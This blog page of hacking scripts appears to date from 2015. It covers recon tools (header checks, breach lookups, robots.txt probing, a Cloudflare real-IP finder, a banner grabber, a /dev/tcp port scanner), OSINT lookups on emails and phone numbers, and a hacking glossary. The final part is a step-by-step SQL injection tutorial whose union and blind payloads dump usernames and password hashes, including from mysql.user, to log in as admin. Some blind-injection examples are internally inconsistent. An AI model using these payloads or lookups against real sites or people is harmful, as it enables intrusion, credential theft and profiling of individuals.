Monday, 31 August 2015

Pytjone RESOLVER BASH SCRIPT

BASH SCRIPT FOR CHECKING HTTP HEADERS FOR SECURITY

For checking http header for security perspective you can visit Security Headers . It will check for following header.
Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection
I wrote bash script which check HTTP header of website against securityheaders.com & give output.
chmod +x header.sh
./header.sh
HTTP-header-for-security
HTTP-Header

BASH SCRIPT FOR CHECKING AN ACCOUNT THAT HAS BEEN COMPROMISED IN A DATA BREACH.

Troyhunt start great website  for checking your email address has been compromised in data breach or not.Right now Adobe,Stratfor,Gawker,Pixel Federation,Yahoo!,Sony,Vodafone `s breach email address is listed. You can check it manually on their site.
I wrote simple bash script for checking against their site that email address has been compromised or not.You can also write in python using simple requests module.
python-havebeenpwned
python-havebeenpwned

have-i-been-pwned bash script
have-i-been-pwned bash script
cd haveibeenpwned
chmod +x haveibeenpwned.sh
./haveibeenpwned.sh
Please enter email address to check against http://haveibeenpwned.com
troyhunt%40hotmail.com
You have been pwned in [“Adobe”] breach

PYTHON SCRIPT FOR AUDITING ROBOTS.TXT

Before one year i wrote different  methods to exploit robots.txt file; you can find it here. Sometimes, due to weak directory permission you can get into dis-allowed directory from robots.txt.This python script  check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.For Original article click here.
It require python3 and urlib3 module.
git clone https://github.com/behindthefirewalls/Parsero.git
cd Parsero
python3 parsero.py -h
python3 parsero.py -u localhost/mutillidae
Exploit Robots.txt
Auditing Robots.txt
Now you can see that which dis-allowed directory is allowed , it means for which we got HTTP-status code 200.

TRuECALLER NAME RETRIEVER PYTHON SCRIPT

Truecaller is a global phone directory application for smartphones and feature phones, and accessible via a Web site. If you have any unknown mobile number you can search in truecaller website or using truecaller application.Thispython script is written by A’mmer Almadani. Script is still in developing phase.More functions will be added soon.
cd callerpy
Now open caller.py file & enter your twitter credential in line 39,40. it will use for authentication.
python caller.py -h
usage: callerpy.py [-h] -n number [-c country] [-cc country code] -l login
TrueCaller Name Retriever
optional arguments:
-h, –help            show this help message and exit
-n number, –number number
Phone Number Without Country Code (default: None)
-c country, –country country
Country | String (default: None)
-cc country code, –countrycode country code
Country | Int (default: None)
-l login, –login login
Login Method | twitter, g+, fb (default: twitter)
python callerpy.py -n 9016986989 -c india-other -l twitter
Truecaller Name Retriever
Truecaller Name Retriever Python ScriptS

PYTHON sCRIPT TO SEARCH EMAIL ADDRESSES AGAINST THE GRAVATAR DATABASE.

Gravatar is a service for providing globally unique avatars.When the user posts a comment on such a blog that requires an e-mail address, the blogging software checks whether that e-mail address has an associated avatar at Gravatar. If so, the Gravatar is shown along with the comment.Script is made by averagesecurityguy . Our script take email address & check against gravatar database , if email address is exist , then extract username , location, accountdetail.First we will understand how it`s work , for developer resources click here.
To view details of email address ; we need  to create email hash of address. For example , if you want to check email address nirav.desai1991@gmail.com. We have to create md5 hash of email address.
root@bt:~#echo -n nirav.desai1991@gmail.com| md5sum
dfd36ad92895ea6b7829d2918ad07fcf
To extract details about email address we have to make following request
http://en.gravatar.com/dfd36ad92895ea6b7829d2918ad07fcf.json
And there we can get details about my gravatar profile.
It`s just simple details how it`s work. Now we will go to script, Gravatar.py takes a file with a list of email address, one on each line, and searches Gravatar for information about the email address. If address is  registered with Gravatar, then selected data points are extracted from the  Gravatar profile.
Now you need email address list file .
python gravatar.py email
gravatar email address
gravatar email address search

CLOUDFLARE RESOLVeR BASH SCRIPT

CloudFlare is a content delivery network and distributed domain name server service marketed as improving website performance and speed and providing security. Before one year i posted different methods to find out real I.P. behind cloudflare.
All those methods are only working , if there is admin misconfiguration.
(1)DNS bruteforce
(2)NMAP
(3)Netcraft toolbar
I made simple bash script which do all things for you, you just have to provide name of website which is behind cloudflare.
cd cloudflare-ip
chmod +x cloudflare-ip.sh
./cloudflare-ip.sh
In script you have to change I.P. in line 45 . i used dns variable , because for unknown DNS my isp redirect to  its address ,so we can know that response is valid or not.Change that I.P. according to your setting.
cloudflare-resolver

BANNER GRABBING PYTHON SCRIPT

This is simple banner grabbing python script which can grab service banner of ports 21,22,25,80,110,443. If you want to grab banner of different ports ;you can modified it as per your requirement.
#!/usr/bin/python
import socket
def retBanner(ip, port):
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip, port))
banner = s.recv(1024)
return banner
except:
return
def main():
portList = [21,22,25,80,110,443]
for x in range(147, 150):
ip = ‘192.168.95.’ + str(x)
for port in portList:
banner = retBanner(ip, port)
if banner:
print ‘[+] ‘ + ip + ‘ : ‘ + banner
if __name__ == ‘__main__’:
main()
First we import socket library to script. Then we defined two function (1)retBanner (2)main
(1)retBanner:-
socket.setdefaulttimeout(2) indicate that default timeout of socket is 2 second.
s = socket.socket() indicate that we open socket.
s.connect((ip, port)) indicate that connect socket to specific i.p. and specific port.
s.recv(1024) read next 1024 bytes of socket & save it value to variable banner.
(2)main:-
portList = [21,22,25,80,110,443] :- grabbing banner of these ports.If you want to grab more port just add port number in portList array.
for x in range(147, 150): :- It is used for grab banner of block of i.p. It only change fourth octet of i.p. address. Change value according to your requirement.
ip = ‘192.168.95.’ + str(x) :- we defined first three octet of i.p. ;& fourth octet is come from for loop.
for port in portList: :- Scan one by one port from array portList.
banner = retBanner(ip, port) : we called first function retBanner & saved it value to variable banner.
And last two line indicate that if we got banner than print on screen with i.p. : banner.
(3)if __name__ == ‘__main__’: It indicate that hat our Python files can act as either reusable modules, or as standalone programs.
And last line of calling of main function.
python_banner_grabbing
python_banner_grabbing
Usage of script
chmod +x script_name
python script_name

PORT SCANNING SHELL SCRIPT

Here is the code for a simple port scanner constructed with bash. The script takes three arguments: a host name or I.P. address, the port at which we wish to start our scans, and the port at which we wish to stop our scans.But before this you have to add /dev/tcp/ support to bash.
#!/bin/bash
#populate our variables from the arguments
host=$1
startport=$2
stopport=$3
#function pingcheck ping a device to see if it is up
function pingcheck
{
ping=`ping -c 1 -w 10 $host | grep bytes | wc -l`
if [ “$ping” -gt 1 ];then
echo “$host is up”;
else
echo “$host is down quitting”;
exit
fi
}
#function portcheck test a port to see if it is open
function portcheck
{
for ((counter=$startport; counter<=$stopport; counter++))
do
(echo >/dev/tcp/$host/$counter) > /dev/null 2>&1 && echo “$counter open”
done
}
#run our functions
pingcheck
portcheck
We can divide this script in three parts.
(1)In first part we populate variable for argument ;variable $0 is reserved for script name .  ./scriptname host startport stopport
So host value saved in variable 1 ;start port value is saved in variable 2 & stop port value is saved in variable 3.
(2)Second part is ping check function.
We defined ping check function to determine host is up or not. Here we use pipe for giving previous command output to next command.
ping -c 1 -w 10 $host | grep bytes | wc -l
-c 1 is indicated that we only transmitted 1 packet .
-w 10 is indicated timeout value is 10 seconds.
If host is up then we got some response like
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.056 ms
— 127.0.0.1 ping statistics —
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.056/0.056/0.056/0.000 ms
Now this output is redirected to input of next command which is grep bytes ,it used for searching ; so it will only take line which has bytes so out put of that is
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.056 ms
Next this is applied to wc -l which is used for counting line ; so output is one because we have only one line output of previous command.
So final value is 1 ;this value is stored into the variable name ping
Now we used simple if statement which check value in ping variable i value is greater than 1 than host is up otherwise down because if host is down than we don`t get response which contain bytes so no grep output & hence line is zero & value in variable ping is also zero.
(3)Third part is port scanning function
First is for loop ;it will running for start port to stop port which we have to specified in argument while running of script.So if we specified start port =80 ;stop port =85 then for loop will run from 80 to 85 to check open port.
Next is (echo >/dev/tcp/$host/$counter) > /dev/null 2>&1 && echo “$counter open”
Here we are redirect output of /dev/tcp/$host/$counter (Which actually check port is open or not) to /dev/null(Which is null file).2>&1 is used to display error message.And final output is display on screen.
And in last two line we called function which we defined in part 2 & part 3.
Usage of script:
chmod +x script_name.sh
./script_name host start_port stop_port
We can also scan multiple I.P. by reading I.P. from file.


BASIC OF HACKING

BASIC OF HACKING

Hacker means someone who finds weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks.Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge. The subculture that has evolved around hackers is often referred to as the computer underground but it is now an open community. While other uses of the word hacker exist that are not related to computer security, they are rarely used in mainstream context.

Classifications:-


Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond (author of The New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat, grey hat, black hat and script kiddie.

White Hat:-


A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council , also known as the International Council of Electronic Commerce Consultants has developed certifications, course ware, classes, and online training covering the diverse arena of Ethical Hacking.

Black Hat:-


A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005). Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network.

Part 1: Targeting


The hacker determines what network to break into during this phase. The target may be of particular interest to the hacker, either politically or personally, or it may be picked at random. Next, they will port scan a network to determine if it is vulnerable to attacks, which is just testing all ports on a host machine for a response. Open ports—those that do respond—will allow a hacker to access the system. 

Part 2: Research And Information Gathering


It is in this stage that the hacker will visit or contact the target in some way in hopes of finding out vital information that will help them access the system. The main way that hackers get desired results from this stage is from "social engineering", which will be explained below. Aside from social engineering, hackers can also use a technique called "dumpster diving". Dumpster diving is when a hacker will literally search through users' garbage in hopes of finding documents that have been thrown away, which may contain information a hacker can use directly or indirectly, to help them gain access to a network.

Part 3: Finishing The Attack


This is the stage when the hacker will invade the preliminary target that he/she was planning to attack or steal. Many "hackers" will be caught after this point, lured in or grabbed by any data also known as a honeypot (a trap set up by computer security personnel).

Grey Hat:-


A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.

Elite Hacker:-


A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.

Script Kiddi:-


A script kiddie (or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature).

Neophyt:-


A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.

Blue Hat:-


A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.

Hacktivis:-


A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. Nation state Intelligence agencies and cyberwarfare operatives of nation states.

Attack:-


A typical approach in an attack on Internet-connected system is:

1. Network enumeration: Discovering information about the intended target.

2. Vulnerability analysis: Identifying potential ways of attack.

3. Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.

In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.

Security Exploit:-


A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, Cross Site Scripting and Cross Site Request Forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through FTP, HTTP, PHP, SSH, Telnet and some web-pages. These are very common in website/domain hacking.

Techniques


Vulnerability Scanner:-


A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses.Hackers also commonly use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Note that firewalls defend computers from intruders by limiting access to ports/machines both inbound and outbound, but can still be circumvented.)

Password Cracking:-


Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Packet Sniffer:-


A packet sniffer is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.

Spoofing Attack (Phishing):-


A spoofing attack involves one program, system, or website successfully masquerading as another by falsifying data and thereby being treated as a trusted system by a user or another program. The purpose of this is usually to fool programs, systems, or users into revealing confidential information, such as user names and passwords, to the attacker.

Rootkit:-


A rootkit is designed to conceal the compromise of a computer's security, and can represent any of a set of programs which work to subvert control of an operating system from its legitimate operators. Usually, a rootkit will obscure its installation and attempt to prevent its removal through a subversion of standard system security. Rootkits may include replacements for system binaries so that it becomes impossible for the legitimate user to detect the presence of the intruder on the system by looking at process tables.

Social Engineering:-


When a Hacker, typically a black hat, is in the second stage of the targeting process, he or she will typically use some social engineering tactics to get enough information to access the network. A common practice for hackers who use this technique, is to contact the system administrator and play the role of a user who cannot get access to his or her system.

Trojan Horses:-


A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a back door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)

Viruses:-


A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. While some are harmless or mere hoaxes most computer viruses are considered malicious.

Worm:-


Like a virus, a worm is also a self-replicating program. A worm differs from a virus in that it propagates through computer networks without user intervention. Unlike a virus, it does not need to attach itself to an existing program. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program.

Key Loggers:-


A key logger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers uses virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes to even enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale and data collected by the key logger could be used for catching employee fraud.


Saturday, 29 August 2015

SQL Injection Tutorial by 4$hI$# (MySQL) in 6 Steps

SQL Injection Tutorial by 4$hI$#  (MySQL)


In this tutorial i will describe how sql injection works and how to
use it to get some useful information.






What Is Sql Injection ?



It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).


1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)


So let's start with some action :D

                                                Step 1

1). Check for vulnerability Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if is vulrnable we add to the end of url ' (quote), and that would be http://www.site.com/news.php?id=5' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar that means is vulrnable to sql injection :)

                                                Step 2

2). Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that) that means that the it has 3 columns, cause we got an error on 4.

                                                Step 3

3). Check for UNION function With union we can select more data in one sql statement. so we have http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). ) if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

                                                Step 4

4). Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. let say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar. it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." i didn't see any paper covering this problem, so i must write it :) what we need is convert() function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* or with hex() and unhex() i.e. http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* and you will get MySQL version :D

                                                Step 5

5). Getting table and column name well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version. we must guess table and column name in most cases. common table names are: user/s, admin/s, member/s ... common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc... i.e would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D) we know that table admin exists... now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name) we get username displayed on screen, example would be admin, or superadmin etc... now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name) we seen password on the screen in hash or plain-text, it depends of how the database is set up :) i.e md5 hash, mysql hash, sha1... now we must complete query to look nice :) for that we can use concat() function (it joins strings) i.e http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon) (there is another way for that, char(58), ascii value for : ) http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* now we get dislayed username:password on screen, i.e admin:admin or admin:somehash when you have this, you can login like admin or some superuser :D if can't guess the right table name, you can always try mysql.user (default) it has user i password columns, so example would be http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

                                                Step 6

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part :)



2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:


To be continued and updated...